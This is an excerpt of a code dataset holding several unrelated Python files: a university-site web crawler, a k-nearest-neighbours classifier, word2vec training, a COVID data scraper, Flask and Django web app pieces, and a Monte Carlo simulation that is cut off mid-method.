resp):\r\n global num_words_longest_page\r\n global longest_page\r\n global count_unique_url\r\n global master_freq_dict\r\n global master_subdomain_dict\r\n\r\n find_lst=[]\r\n token_list = []\r\n lst = []\r\n \r\n # filters to only accept URLs from the frontier that have a webpage status of 200 (high quality)\r\n # adds to a list all the relevant webpage text (p,h1,h2) and tokenizes it\r\n # tokenizer removes non alphabetical characters and stopwords from webpage text\r\n\r\n if resp.status == 200:\r\n page = resp.raw_response.text\r\n soup = BeautifulSoup(page, \"lxml\")\r\n total_count = 0\r\n find_lst.extend([s for s in soup.findAll('p')])\r\n find_lst.extend([s for s in soup.findAll('h1')])\r\n find_lst.extend([s for s in soup.findAll('h2')])\r\n for s in find_lst:\r\n fin_text = ''.join(s.findAll(text=True))\r\n fin_text = fin_text.lower()\r\n fin_text = re.sub('[^a-zA-Z]+', ' ', fin_text)\r\n \r\n fin_text = re.sub(r\"\\b(a|about|above|after|again|against|all|am|an|and|any|are|aren't|as|\"\r\n + r\"at|be|because|been|before|being|below|between|both|but|\"\r\n + r\"by|can't|cannot|could|couldn't|did|didn't|do|\"\r\n + r\"does|doesn't|doing|don't|down|during|each|few|for|from|further|had|hadn't|\"\r\n + r\"has|hasn't|have|haven't|having|he|he'd|he'll|he's|her|here|here's|hers|\"\r\n + r\"herself|him|himself|his|how|how's|i|i'd|i'll|i'm|i've|if|in|into|is|\"\r\n + r\"isn't|it|it's|its|itself|let's|me|more|most|mustn't|my|myself|no|nor|not|of|off|on|\"\r\n + r\"once|only|or|other|ought|our|ours|ourselves|out|over|own|\"\r\n + r\"same|shan't|she|she'd|she'll|she's|should|shouldn't|so|some|such|than|that|\"\r\n + r\"that's|the|their|theirs|them|themselves|then|there|there's|these|they|they'd|they'll|they're|\"\r\n + r\"they've|this|those|through|to|too|under|until|up|very|was|wasn't|we|we'd|we'll|we're|we've|were|weren't|\"\r\n + r\"what|what's|when|when's|where|where's|which|while|who|who's|whom|why|why's|with|won't|would|wouldn't|\"\r\n + r\"you|you'd|you'll|you're|you've|your|yours|yourself|yourselves)\\b\", ' ', fin_text)\r\n \r\n for token in fin_text.split():\r\n if len(token) > 2:\r\n token_list.append(token)\r\n if token not in master_freq_dict.keys():\r\n master_freq_dict[token] = 1\r\n else:\r\n master_freq_dict[token] += 1\r\n total_count += len(token_list)\r\n token_list = []\r\n \r\n # updates the respective global variable information for feedback report\r\n if total_count > num_words_longest_page:\r\n num_words_longest_page = total_count\r\n longest_page = url\r\n\r\n # ignores webpages that have low quality content (less than 100 tokens)\r\n # calls extract next links and adds to the frontier\r\n if total_count > 100 or url == \"https://www.ics.uci.edu\" or url == \"https://www.cs.uci.edu\" or url == \"https://www.informatics.uci.edu\" or url == \"https://www.stat.uci.edu\":\r\n master_lst.append(url)\r\n count_unique_url += 1\r\n \r\n # tracking subdomains of ics.uci.edu and frequency by adding to global dictionary\r\n parsed = urlparse(url)\r\n if(re.match(r\"^.*\\.ics.uci.edu$\", parsed.netloc)):\r\n subdomain_tup = (parsed.netloc.split(\".\")[0], parsed.scheme)\r\n if subdomain_tup in master_subdomain_dict.keys():\r\n master_subdomain_dict[subdomain_tup] += 1\r\n else:\r\n master_subdomain_dict[subdomain_tup] = 1\r\n\r\n \r\n links = extract_next_links(url, resp)\r\n for link in links:\r\n if is_valid(link) and link not in master_lst:\r\n lst.append(link)\r\n \r\n return lst\r\n\r\n# converts 200 status webpages to html and extracts links that are connected\r\n# returns the list of connected webpages\r\ndef extract_next_links(url, resp):\r\n lst = []\r\n \r\n if (resp.status == 200): #only want high quality content\r\n pages = resp.raw_response.content\r\n \r\n soup = BeautifulSoup(pages, 'lxml')\r\n \r\n \r\n for link in soup.findAll('a', href = True):\r\n lst.append(link['href'])\r\n \r\n return lst\r\n\r\n# determines which URLs are valid\r\n# only accepts valid domains and paths\r\n# defragments URLs and deems certain extensions invalid\r\n# recognizes wics is a crawler trap, and handles it explicitly\r\ndef is_valid(url):\r\n try:\r\n \r\n parsed = urlparse(url)\r\n if parsed.scheme not in set([\"http\", \"https\"]):\r\n return False\r\n\r\n\r\n if re.match(r\"^.*\\wics.ics.uci.edu$\", parsed.netloc.lower()) and re.match(r\"^(/event(s)?).*$\", parsed.path.lower()):\r\n return False\r\n if parsed.query != '' and re.match(r\"^.*\\wics.ics.uci.edu$\", parsed.netloc.lower()):\r\n if re.match(r\"^share.*$\", parsed.query.lower()):\r\n return False\r\n if re.match(r\"^today.uci.edu$\", parsed.netloc.lower()):\r\n if not re.match(r'^/department/information_computer_sciences/.*$', parsed.path.lower()):\r\n return False\r\n if re.match(r\"^.*/pdf/.*$\", parsed.path.lower()):\r\n return False\r\n \r\n if not re.match(r\"^((?!ics.uci.edu|stat.uci.edu|cs.uci.edu|informatics.uci.edu|today.uci.edu).)*$\", parsed.netloc.lower()):\r\n if parsed.fragment == '':\r\n return not re.match(\r\n r\".*\\.(css|js|bmp|gif|jpe?g|ico\"\r\n + r\"|png|tiff?|mid|mp2|mp3|mp4\"\r\n + r\"|wav|avi|mov|mpeg|ram|m4v|mkv|ogg|ogv|pdf\"\r\n + r\"|ps|eps|tex|ppt|pptx|doc|docx|xls|xlsx|names\"\r\n + r\"|data|dat|exe|bz2|tar|msi|bin|7z|psd|dmg|iso\"\r\n + r\"|epub|dll|cnf|tgz|sha1|ppsx\"\r\n + r\"|thmx|mso|arff|rtf|jar|csv|in|java|py\"\r\n + r\"|rm|smil|wmv|swf|wma|zip|rar|gz|r|c|txt|m|Z)$\", parsed.path.lower())\r\n \r\n \r\n return False\r\n \r\n except TypeError:\r\n print (\"TypeError for \", parsed)\r\n raise\r\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"645129815","text":"import math, os, sys, io, time\r\n\r\nclass ProbablisticKNN(object):\r\n \"\"\"\r\n ProbablisticKNN\r\n \"\"\"\r\n\r\n def __init__(self, training_data):\r\n \"\"\"\r\n The training data must be list\r\n of tuples. The first element in\r\n each tuple must be an integer\r\n that corresponds to a particular\r\n class. The second element in\r\n each tuple is a list, which is\r\n the input vector. Each input\r\n vector must have the same number\r\n as the others or an exception\r\n will be raised.\r\n \"\"\"\r\n\r\n self._class_column = []\r\n self._feature_column = []\r\n for x in training_data:\r\n self._validateDataPoint(x)\r\n self._class_column.append(x[0])\r\n self._feature_column.append(x[1])\r\n\r\n def getProbabilityForPoint(self, k_value, point, class_id):\r\n \"\"\"\r\n The point must be of type list.\r\n It is to be a vector with the\r\n same number of dimensions as\r\n each of the input vectors from\r\n the training data set (or an\r\n exception will be raised).\r\n The classification is the\r\n particular class that the data\r\n point supposedly belongs to.\r\n This method will return a\r\n floating point between 1 and\r\n 0 representing the probability\r\n that the given point is a\r\n member of the given class.\r\n The classification is an\r\n integer corresponding to\r\n the class. If the integer\r\n provided does not correspond\r\n to a class from the training\r\n data, an exception will be\r\n raised.\r\n \"\"\"\r\n\r\n index_list = self._findKNearestNeighbors(k_value, point)\r\n\r\n if type(class_id) is not type(int(0)):\r\n raise TypeError(\"class ID must be\" +\r\n \"of type integer\")\r\n\r\n if class_id not in self._class_column:\r\n raise RuntimeError(\"class ID must be\" +\r\n \"one of the values\" +\r\n \"found in the\" +\r\n \"classes of the\" +\r\n \"training data\" +\r\n \"points\")\r\n\r\n numerator_sum = int(0)\r\n for x in index_list:\r\n if self._class_column[x] == class_id:\r\n numerator_sum = numerator_sum + 1\r\n\r\n return float(numerator_sum) / float(k_value)\r\n\r\n def _findKNearestNeighbors(self, k_value, point):\r\n \"\"\"\r\n Returns a list of indexes\r\n to a subset of elements in\r\n the training dataset that\r\n make up the K-nearest\r\n neighbors to the input\r\n point.\r\n \"\"\"\r\n\r\n if type(k_value) is not type(int(0)):\r\n raise TypeError(\"k value must be \" +\r\n \"an integer\")\r\n\r\n length_of_feature_vector = len(self._feature_column[0])\r\n\r\n if type(point) is not type([]):\r\n raise TypeError(\"test point must be \" +\r\n \"feature vector of \" +\r\n \"type list\")\r\n\r\n if len(point) != length_of_feature_vector:\r\n raise TypeError(\"test point feature \" +\r\n \"vector must have \" +\r\n \"the same cardinality \" +\r\n \"as the feature \" +\r\n \"vectors in the \" +\r\n \"training data \")\r\n\r\n # just for testing...\r\n #print(length_of_feature_vector)\r\n #print(len(self._feature_column))\r\n #print(len(self._class_column))\r\n\r\n proximity_column = []\r\n ctr = int(0)\r\n for x in self._feature_column:\r\n proximity_float = self._proximity(x, point)\r\n temp_proximity_tuple = (ctr, proximity_float)\r\n proximity_column.append(temp_proximity_tuple)\r\n ctr = ctr + 1\r\n\r\n # just for testingg\r\n #for x in proximity_column:\r\n # print(x[0])\r\n # print(x[1])\r\n\r\n #just for testingg\r\n #for p in proximity_column:\r\n # print(p)\r\n # print(\"---\")\r\n #print(\"--end--\")\r\n\r\n countdown_k = k_value\r\n temp_prox_col = proximity_column\r\n k_nearest_proximities_tuples = []\r\n while(True):\r\n if countdown_k == int(0): break\r\n if len(temp_prox_col) == 0:\r\n raise RuntimeError(\"not enough data \" +\r\n \"points for \" +\r\n \"specified k \" +\r\n \"value\")\r\n temp_prox_tuple = temp_prox_col[0]\r\n first_iteration = True\r\n for i in temp_prox_col:\r\n if first_iteration == True:\r\n first_iteration = False\r\n continue\r\n if i[1] < temp_prox_tuple[1]:\r\n temp_prox_tuple = i\r\n k_nearest_proximities_tuples.append(temp_prox_tuple)\r\n countdown_k = countdown_k - 1\r\n temp_prox_col.remove(temp_prox_tuple)\r\n indexes_of_k_nearest_neighbors = []\r\n for j in k_nearest_proximities_tuples:\r\n indexes_of_k_nearest_neighbors.append(j[0])\r\n return indexes_of_k_nearest_neighbors\r\n\r\n def _validateDataPoint(self, x):\r\n \"\"\"\r\n make sure the the data point\r\n is given in the proper format\r\n (and raise exception if not)\r\n \"\"\"\r\n\r\n if type(x) is not type(tuple()):\r\n raise TypeError(\"all data points \" +\r\n \"in training data \" +\r\n \"must be of type \" +\r\n \"tuple\")\r\n\r\n if type(x[0]) is not type(int(0)):\r\n raise TypeError(\"all class IDs \" +\r\n \"must be of type \" +\r\n \"integer\")\r\n\r\n if type(x[1]) is not type([]):\r\n raise TypeError(\"feature vector \" +\r\n \"for each data \" +\r\n \"must be of \" +\r\n \"type list\")\r\n\r\n if len(self._feature_column) != 0:\r\n if len(x[1]) != len(self._feature_column[0]):\r\n raise TypeError(\"the feature \" +\r\n \"vector of \" +\r\n \"each point \" +\r\n \"in the \" +\r\n \"training \" +\r\n \"data set \" +\r\n \"must have \" +\r\n \"the same \" +\r\n \"cardinality\")\r\n\r\n float_list = x[1]\r\n\r\n for value in float_list:\r\n if type(value) is not type(float(0.0)):\r\n raise TypeError(\"each value in the \" +\r\n \"feature vector \" +\r\n \"must be of type \" +\r\n \"float\")\r\n\r\n def _proximity(self, list1, list2):\r\n \"\"\"\r\n determine the distance from\r\n one feature vector to another\r\n \"\"\"\r\n\r\n current_val = float(0.0)\r\n for i in range(0, len(list1)):\r\n temp = float(list1[i]) - float(list2[i])\r\n temp = math.pow(temp, 2)\r\n current_val = math.pow(math.pow(current_val, 2) + temp, 0.5)\r\n\r\n return current_val\r\n\r\n def listProbabilitiesAtPoint(self, k_value, point):\r\n \"\"\"\r\n returns a list of tuples\r\n each containing a class\r\n ID and a corresponding\r\n probability\r\n \"\"\"\r\n\r\n existing_class_ids = []\r\n for x in self._class_column:\r\n if x not in existing_class_ids:\r\n existing_class_ids.append(x)\r\n\r\n sorted_class_ids = []\r\n while(True):\r\n if len(existing_class_ids) < 1:\r\n break\r\n temp_lowest_id_val = existing_class_ids[0]\r\n for i in existing_class_ids:\r\n temp_lowest_id_val\r\n sorted_class_ids.append(temp_lowest_id_val)\r\n existing_class_ids.remove(temp_lowest_id_val)\r\n\r\n list_of_tuples = []\r\n for x in sorted_class_ids:\r\n temp_prob = self.getProbabilityForPoint(k_value, point, x)\r\n temp_tuple = (x, temp_prob)\r\n list_of_tuples.append(temp_tuple)\r\n return list_of_tuples\r\n\r\n def classifyPoint(self, k_value, point):\r\n \"\"\"\r\n call the listProbabilitiesAtPoint\r\n method and determine which class\r\n has the highest probability for\r\n the given point\r\n \"\"\"\r\n\r\n probabilities = self.listProbabilitiesAtPoint(k_value, point)\r\n if len(probabilities) == 0:\r\n raise RuntimeError(\"listProbabilitiesAtPoint method \" +\r\n \"returned empty list\")\r\n counter = int(0)\r\n for x in probabilities:\r\n if counter == 0:\r\n max_prob_obj = x\r\n else:\r\n if x[1] > max_prob_obj[1]:\r\n max_prob_obj = x\r\n counter = counter + 1\r\n return max_prob_obj\r\n\r\n def classifyPointAndReturnOnlyClassID(self, k_value, point):\r\n \"\"\"\r\n just like classifyPoint except\r\n only the class ID (of type\r\n integer) is returned\r\n \"\"\"\r\n\r\n return self.classifyPoint(k_value, point)[0]\r\n\r\n def classifyPointAndReturnOnlyProbabilityValue(self, k_value, point):\r\n \"\"\"\r\n just like classifyPoint except\r\n only the probability value\r\n corresponding to the class\r\n with the highest probability\r\n is returned (only a float\r\n value is returned)\r\n \"\"\"\r\n\r\n return self.classifyPoint(k_value, point)[1]\r\n","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":9771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"406612355","text":"#!/usr/bin/python\n__author__ = 'ytay2'\n\n# import libraries, modules\nimport gensim, logging\nimport os \nfrom nltk import word_tokenize\nimport nltk\nimport csv\nimport re\nfrom gensim.models import Word2Vec\nfrom gensim.corpora import WikiCorpus\nimport logging\nfrom _tools import *\nfrom _builder import * \nfrom _sentences import * \nimport argparse\nimport os.path\nimport datetime\n\n# Set up args parser\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-t\", \"--type\", type=str,\n help=\"full model or extracted sentences only\")\nparser.add_argument(\"-l\", \"--label\", type=str,\n help=\"label of model name\")\nparser.add_argument(\"-d\", \"--dim\", type=int,\n help=\"dimensions of model\")\nargs = parser.parse_args()\n\n\nmin_count = 10\nwindow = 5\nsg = 0\n\n#main script execution\nif __name__ == \"__main__\":\n\n\t# # Create a training log\n\t# trainLogs = open('train.txt','a+')\n\tsize = 100\n\tif(args.dim is not None):\n\t\tif(type(args.dim) is int):\n\t\t\tsize = args.dim\t\n\telse:\n\t\tsize = 100\n\tt0 = datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\")\n\tlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\tlogging.info(\"Started training..from corpus directory\")\n\tlogging.info(\"Size:%d\",size)\n\tif(args.type=='extracted'):\n\t\t# # Get filelist of whatever that is completed\n\t\tfilelist = getCompletedFilelist()\n\t\tlogging.info(filelist)\n\t\tsentences = CSVSentences('Data',filelist,30,hyper=False)\n\telif(args.type=='full'):\n\t\tsentences = WIKISentences()\n\t\t#Train model\n\telif(args.type=='billion'):\n\t\tsentences = OneBillionSentences()\n\tmodel = gensim.models.Word2Vec(sentences, min_count=min_count,workers=4,size=size,window=window,sg=sg)\n\tlogging.info(\"Completed training model\")\n\t# label=args.label\n\tmodel_name = 'Final/w2v'+str(size) +\"_\"+args.type\n\tmodel.save(model_name)\n\tlogging.info(\"Persisted model %s to /Models directory\",model_name)\n\tt1 = datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\")\n\twith open('traininglog.txt','a+') as f:\n\t\twriter = csv.writer(f,delimiter=',')\n\t\twriter.writerow([model_name,t0,t1,min_count,window,sg,args.type])\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"82138895","text":"from abc import ABC, abstractmethod\n\nimport pandas as pd\nimport us\n\nfrom can_tools.scrapers import CMU, DatasetBase\nfrom can_tools.scrapers.official.base import ArcGIS\n\n\ndef case_cmu(**kw):\n kwargs = dict(category=\"cases\", measurement=\"cumulative\", unit=\"people\")\n kwargs.update(kw)\n return CMU(**kwargs)\n\n\ndef deaths_cmu(**kw):\n return case_cmu(category=\"deaths\", **kw)\n\n\nclass WisconsinArcGIS(ArcGIS, ABC):\n \"\"\"\n ArcGIS scraper that retrieves dashboard information for the\n state of Wisconsin (which has their own self-hosted ArcGIS\n instance)\n \"\"\"\n\n has_location = True\n state_fips = int(us.states.lookup(\"Wisconsin\").fips)\n source = \"https://www.dhs.wisconsin.gov/covid-19/data.htm\"\n source_name = \"Wisconsin Department of Health Services\"\n\n location_type: str\n SERVICE: str = \"DHS_COVID19/COVID19_WI\"\n SHEET: int\n\n crename = {\n \"positive\": CMU(\n category=\"cases\",\n measurement=\"cumulative\",\n unit=\"people\",\n ),\n \"negative\": CMU(\n category=\"pcr_tests_negative\",\n measurement=\"cumulative\",\n unit=\"unique_people\",\n ),\n \"pos_new\": CMU(\n category=\"cases\",\n measurement=\"new\",\n unit=\"people\",\n ),\n \"neg_new\": CMU(\n category=\"pcr_tests_negative\",\n measurement=\"new\",\n unit=\"unique_people\",\n ),\n \"test_new\": CMU(\n category=\"pcr_tests_total\",\n measurement=\"new\",\n unit=\"unique_people\",\n ),\n \"deaths\": CMU(category=\"deaths\", measurement=\"cumulative\", unit=\"people\"),\n \"dth_new\": CMU(category=\"deaths\", measurement=\"new\", unit=\"people\"),\n \"hosp_yes\": CMU(\n category=\"hospital_beds_in_use_covid\",\n measurement=\"cumulative\",\n unit=\"people\",\n ),\n # sex\n \"pos_fem\": case_cmu(sex=\"female\"),\n \"pos_male\": case_cmu(sex=\"male\"),\n \"dths_fem\": deaths_cmu(sex=\"female\"),\n \"dths_male\": deaths_cmu(sex=\"male\"),\n # age\n \"pos_0_9\": case_cmu(age=\"0-9\"),\n \"pos_10_19\": case_cmu(age=\"10-19\"),\n \"pos_20_29\": case_cmu(age=\"20-29\"),\n \"pos_30_39\": case_cmu(age=\"30-39\"),\n \"pos_40_49\": case_cmu(age=\"40-49\"),\n \"pos_50_59\": case_cmu(age=\"50-59\"),\n \"pos_60_69\": case_cmu(age=\"60-69\"),\n \"pos_70_79\": case_cmu(age=\"70-79\"),\n \"pos_80_89\": case_cmu(age=\"80-89\"),\n \"pos_90\": case_cmu(age=\"90_plus\"),\n \"dths_0_9\": deaths_cmu(age=\"0-9\"),\n \"dths_10_19\": deaths_cmu(age=\"10-19\"),\n \"dths_20_29\": deaths_cmu(age=\"20-29\"),\n \"dths_30_39\": deaths_cmu(age=\"30-39\"),\n \"dths_40_49\": deaths_cmu(age=\"40-49\"),\n \"dths_50_59\": deaths_cmu(age=\"50-59\"),\n \"dths_60_69\": deaths_cmu(age=\"60-69\"),\n \"dths_70_79\": deaths_cmu(age=\"70-79\"),\n \"dths_80_89\": deaths_cmu(age=\"80-89\"),\n \"dths_90\": deaths_cmu(age=\"90_plus\"),\n # race and ethnicity\n \"pos_aian\": case_cmu(race=\"ai_an\"),\n \"pos_asn\": case_cmu(race=\"asian\"),\n \"pos_blk\": case_cmu(race=\"black\"),\n \"pos_wht\": case_cmu(race=\"white\"),\n \"pos_mltoth\": case_cmu(race=\"multiple_other\"),\n \"pos_unk\": case_cmu(race=\"unknown\"),\n \"pos_e_hsp\": case_cmu(ethnicity=\"hispanic\"),\n \"pos_e_nhsp\": case_cmu(ethnicity=\"non-hispanic\"),\n \"pos_e_unk\": case_cmu(ethnicity=\"unknown\"),\n \"dths_aian\": deaths_cmu(race=\"ai_an\"),\n \"dths_asn\": deaths_cmu(race=\"asian\"),\n \"dths_blk\": deaths_cmu(race=\"black\"),\n \"dths_wht\": deaths_cmu(race=\"white\"),\n \"dths_mltoth\": deaths_cmu(race=\"multiple_other\"),\n \"dths_unk\": deaths_cmu(race=\"unknown\"),\n \"dths_e_hsp\": deaths_cmu(ethnicity=\"hispanic\"),\n \"dths_e_nhsp\": deaths_cmu(ethnicity=\"non-hispanic\"),\n \"dths_e_unk\": deaths_cmu(ethnicity=\"unknown\"),\n }\n\n @abstractmethod\n def get_location(self, df: pd.DataFrame):\n pass\n\n def fetch(self):\n return self.get_all_jsons(self.SERVICE, self.SHEET, \"server\")\n\n def arcgis_query_url(\n self,\n service=\"DHS_COVID19/COVID19_WI\",\n sheet=1,\n srvid=\"server\",\n ):\n out = f\"https://dhsgis.wi.gov/{srvid}/rest/services/{service}/MapServer/{sheet}/query\"\n\n return out\n\n def normalize(self, data):\n df = self.arcgis_jsons_to_df(data)\n df.columns = [x.lower() for x in list(df)]\n df[\"location\"] = self.get_location(df)\n\n value_cols = list(set(df.columns) & set(self.crename.keys()))\n\n out = (\n df.melt(id_vars=[\"location\"], value_vars=value_cols)\n .assign(\n dt=self._retrieve_dt(\"US/Central\"), vintage=self._retrieve_vintage()\n )\n .dropna()\n )\n out.loc[:, \"value\"] = pd.to_numeric(out[\"value\"])\n\n # Extract category information and add other variable context\n out = self.extract_CMU(out, self.crename)\n\n cols_to_keep = [\n \"vintage\",\n \"dt\",\n \"location\",\n \"category\",\n \"measurement\",\n \"unit\",\n \"age\",\n \"race\",\n \"ethnicity\",\n \"sex\",\n \"value\",\n ]\n\n return out.loc[:, cols_to_keep]\n\n\nclass WisconsinCounties(WisconsinArcGIS, DatasetBase):\n \"\"\"\n Fetch county-level covid data from Wisconsin's ARCGIS dashboard\n \"\"\"\n\n location_type = \"county\"\n SHEET = 1\n\n def get_location(self, df: pd.DataFrame):\n return df[\"geoid\"].astype(int)\n\n\nclass WisconsinState(WisconsinArcGIS, DatasetBase):\n \"\"\"\n Fetch state-level covid data from Wisconsin's ARCGIS dashboard\n Includes demographic breakdowns\n \"\"\"\n\n location_type = \"state\"\n SHEET = 3\n\n def get_location(self, df: pd.DataFrame):\n return self.state_fips\n","sub_path":"can_tools/scrapers/official/WI/wi_state.py","file_name":"wi_state.py","file_ext":"py","file_size_in_byte":5879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"70039285","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 12 10:36:21 2020\n\n@author: RileyBallachay\n\"\"\"\nfrom scipy.signal import max_len_seq\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport time\nimport control\n\nstart = time.time()\n\ndef PRBS(emptyArg,nstep=100,prob_switch=0.3, Range=[-1.0, 1.0]): \n \"\"\"Returns a pseudo-random binary sequence \n which ranges between -1 and +1\"\"\"\n gbn = np.ones(nstep)\n gbn = gbn*random.choice([-1,1])\n probability = np.random.random(nstep)\n for i in range(0,(nstep-1)):\n prob = probability[i]\n gbn[i+1] = gbn[i]\n if prob < prob_switch:\n gbn[i+1] = -gbn[i+1]\n gbn=gbn.reshape((len(gbn),1))\n return gbn\n \nrang=np.zeros(1000)\nuArray =np.array(list(map(PRBS,rang)))[...,-1]\n\ndef fun(iterator):\n sys = control.tf([np.random.randint(10),],[np.random.randint(10),1.])\n _,yEnd,_ = control.forced_response(sys,U=uArray[iterator,:],T=np.linspace(0,100,100))\n return yEnd\n\nyArray = np.array(list(map(fun,range(1000))))\n \nprint(str(time.time()-start))","sub_path":"Extras/Old Scripts/Test PRBS Methods.py","file_name":"Test PRBS Methods.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"486032","text":"# coding:utf-8\n\nfrom flask import Blueprint, render_template\nfrom ..settings import designer_per_page, designer_artifact_per_page\nfrom ..service import accountService, materialService, artifactService\nfrom ..model import account_type_designer, Artifact, Account\nfrom ..core import get_locale\nfrom ..result_helper import multi_artifact_result\n\nbp = Blueprint(\"designer\", __name__, url_prefix=\"/designer\")\n\n\n@bp.route(\"/\", methods=[\"GET\", \"POST\"])\n@bp.route(\"/page/<int:page>/\", methods=[\"GET\", \"POST\"])\ndef home(page=1):\n offset = (page - 1) * designer_per_page\n limit = designer_per_page\n count, designers = accountService.paginate(account_type=account_type_designer, offset=offset, limit=limit,orderby=[Account.id.desc()])\n return render_template(\"frontend/designers.html\", count=count, designers=designers, page=page)\n\n\n@bp.route(\"/detail/<int:account_id>/\", methods=[\"GET\", \"POST\"])\n@bp.route(\"/detail/<int:account_id>/artifact/page/<int:page>\", methods=[\"GET\", \"POST\"])\ndef show_designer(account_id, page=1):\n locale = get_locale()\n account = accountService.account_by_account_id(account_id)\n count = 0\n artifacts = []\n if account:\n offset = (page - 1) * designer_artifact_per_page\n limit = designer_artifact_per_page\n count, artifact_ids = artifactService.paginate_id(account_id=account_id, locale=locale,\n orderby=[Artifact.created.desc()], offset=offset, limit=limit)\n\n if artifact_ids:\n artifacts = multi_artifact_result(artifact_ids, locale, with_account=False, with_asset=False,\n with_material=False)\n\n return render_template(\"frontend/designerDetail.html\", artifact_count=count, artifacts=artifacts, designer=account,\n page=page)\n","sub_path":"xinshangjia/frontend/designer.py","file_name":"designer.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"162064316","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport traceback\nfrom sys import argv\n\nfrom wechatsogou import *\n\nwechats = WechatSogouApi()\nmysql = mysql('mp_info')\n\nfor i in range(1, len(argv)):\n try:\n print(\"添加公众号: \" + argv[i])\n if not mysql.where({'name': argv[i]}).find(1):\n wechat_info = wechats.search_gzh_info(argv[i])\n if wechat_info != \"\":\n mysql.add({'name': wechat_info['name'],\n 'wx_hao': wechat_info['wechatid'],\n 'description': wechat_info['jieshao'],\n 'company': wechat_info['renzhen'],\n 'logo_url': wechat_info['img'],\n 'qr_url': wechat_info['qrcode'],\n 'wz_url': wechat_info['url'],\n 'recent_wz': wechat_info['recent'],\n 'recent_time': wechat_info['recent_time'],\n 'last_qunfa_id': 0,\n 'create_time': time.strftime(\"%Y-%m-%d %H:%M:%S\",\n time.localtime(time.time()))})\n else:\n print(u\"已经存在的公众号: \" + argv[i])\n except Exception:\n traceback.print_exc()\n continue\nprint(\"success\")\n","sub_path":"auto_add_mp.py","file_name":"auto_add_mp.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"481237882","text":"from django import forms\nfrom django.utils.translation import gettext_lazy as _\nfrom django.conf import settings\n\nfrom oscar.apps.address.forms import UserAddressForm as BaseUserAddressForm\nfrom oscar.core.loading import get_model\n\nUserAddress = get_model('address', 'useraddress')\n\n\nclass UserAddressForm(BaseUserAddressForm):\n\n class Meta:\n model = UserAddress\n fields = [\n 'line4',\n 'line1', 'line2', 'line3',\n 'phone_number', 'notes'\n ]\n labels = {\n 'line1': _('Street'),\n 'line2': _('Building'),\n 'line3': _('Flat'),\n }\n widgets = {\n 'line4': forms.Select(choices=settings.ADDRESS_CITIES),\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['line1'].required = True\n self.fields['line2'].required = True\n self.fields['line3'].required = False\n self.fields['line4'].required = True\n self.fields['phone_number'].required = True\n","sub_path":"address/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"18902391","text":"from flask import Blueprint,request\nfrom database.models import Project\nfrom utils.decorator import json_response,require_token\nfrom services import project_service\nproject_api=Blueprint('project_api', __name__)\n@project_api.route('/public/project/get_projects_by_page',methods=['POST'])\n@json_response\ndef get_projects_by_page(result):\n data=request.get_json()\n\n page=data.get('page',1)\n page_size=data.get('page_size',20)\n is_recommend=data.get('is_recommend',None)\n status=data.get('status',None)\n order_by=data.get('order_by')\n if order_by==\"update\":\n order_by='updated_time desc'\n elif order_by==\"create\":\n order_by=\"created_time desc\"\n (projects,paginate)=project_service.query_projects_by_page(page=page,page_size=page_size,order_by=order_by,querys={\"status\":status,'is_recommend':is_recommend})\n\n arr=[]\n for project in projects:\n arr.append(project.as_map())\n result['projects']=arr\n\n","sub_path":"views/api/project_api.py","file_name":"project_api.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"413565630","text":"class MonteCarlo(object):\r\n \"Simple monte carlo class\"\r\n\r\n def __init__( self, temperature=1, itermax=100) :\r\n if temperature <= 0.0 :\r\n raise ValueError(\"Temperature must be *positive*.\")\r\n if not isinstance( itermax, int) : \r\n raise TypeError(\"itermax must be an *integer*.\")\r\n self.temperature = temperature\r\n \"\"\" Simulation Temperature \"\"\"\r\n self.itermax = itermax\r\n \"\"\" Maximum iterations to run \"\"\"\r\n\r\n\r\n def move_particle_randomly( self, density) :\r\n \"\"\" Randomly move one particle left or right \"\"\"\r\n from numpy import random, array\r\n density = array(density)\r\n # Choose random position (weighted by occupation number)\r\n particle_positions = []\r\n for i in range(len(density)) :\r\n particle_positions += [i] * density[i]\r\n pos1 = random.choice(particle_positions)\r\n # Randomly choose valid position for particle to move to\r\n while True :\r\n pos2 = pos1 + random.choice([-1,1])\r\n if 0 <= pos2 < len(density) : break\r\n newdensity = array(density)\r\n newdensity[pos1] -= 1\r\n newdensity[pos2] += 1\r\n return newdensity\r\n\r\n\r\n def accept_move( self, energy, density0, density1) :\r\n \"\"\" Accept or reject particle move based on energy function\"\"\"\r\n from numpy import random, exp\r\n E0 = energy(density0)\r\n E1 = energy(density1)\r\n if E1 < E0 : return True\r\n elif exp(-( E1 - E0) / self.temperature ) > random.random() : \r\n return True\r\n else : return False\r\n\r\n\r\n def __call__( self, initial_density, energy):\r\n \"\"\" Iterate MonteCarlo object up to itermax \"\"\"\r\n from numpy import any, array\r\n density = 